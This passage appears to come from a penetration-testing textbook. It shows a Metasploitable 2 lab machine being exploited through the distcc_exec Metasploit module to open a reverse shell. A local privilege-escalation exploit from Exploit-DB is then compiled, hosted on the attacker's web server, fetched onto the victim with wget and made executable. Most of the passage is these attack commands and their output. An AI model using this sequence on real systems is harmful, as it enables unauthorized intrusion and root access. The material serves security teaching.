Shellcodes:
No Result
root@yazpistachio# cp /usr/share/exploitdb/exploits/linux/local/8572.c .
root@yazpistachio# gcc -m32 -o tuxbowling 8572.c
root@yazpistachio# cp tuxbowling /var/www/html
Now that we have the local exploit staged so we can retrieve it, we can move on to the
exploit.
Example 6-16
shows exploiting Metasploitable 2
using a vulnerability in a
distributed C compiler. Once the system is compromised, you’ll see that I’ve down‐
loaded the local exploit binary to the exploited system. Once the file has been com‐
piled, the executable bit is set automatically, telling the system
it is a program that can
be directly executed. Once it’s been downloaded using
wget
, the file loses any permis‐
sion bits that were set, meaning we need to reset
the executable bit by using
chmod +x
on the file. Once we’ve set the executable bit, we are ready to work on the privilege
escalation.
Example 6-16. Exploiting Metasploitable 2
msf
exploit
(
unix/misc/distcc_exec
)
>
set
RHOST 192.168.86.47
RHOST
=
> 192.168.86.47
msf exploit
(
unix/misc/distcc_exec
)
> exploit
[
*
]
Started reverse TCP double handler on 192.168.86.30:4444
[
*
]
Accepted the first client connection...
[
*
]
Accepted the second client connection...
[
*
]
Command:
echo
YfrONcWAHdPy0YS1;
[
*
]
Writing to socket A
[
*
]
Writing to socket B
[
*
]
Reading from sockets...
[
*
]
Reading from socket B
[
*
]
B:
"YfrONcWAHdPy0YS1\r\n"
[
*
]
Matching...
[
*
]
A is input...
[
*
]
Command
shell session
1
opened
(
192.168.86.30:4444 -> 192.168.86.47:57395
)
at
2018-02-11 13:25:31 -0700
wget http://192.168.86.30/tuxbowling
--15:24:58-- http://192.168.86.30/tuxbowling
=
>
`
tuxbowling
'
Connecting to 192.168.86.30:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7,628 (7.4K)
0K ....... 100% 657.70 KB/s
15:24:58 (657.70 KB/s) - `tuxbowling'
saved
[
7628/7628
]
chmod +x tuxbowling
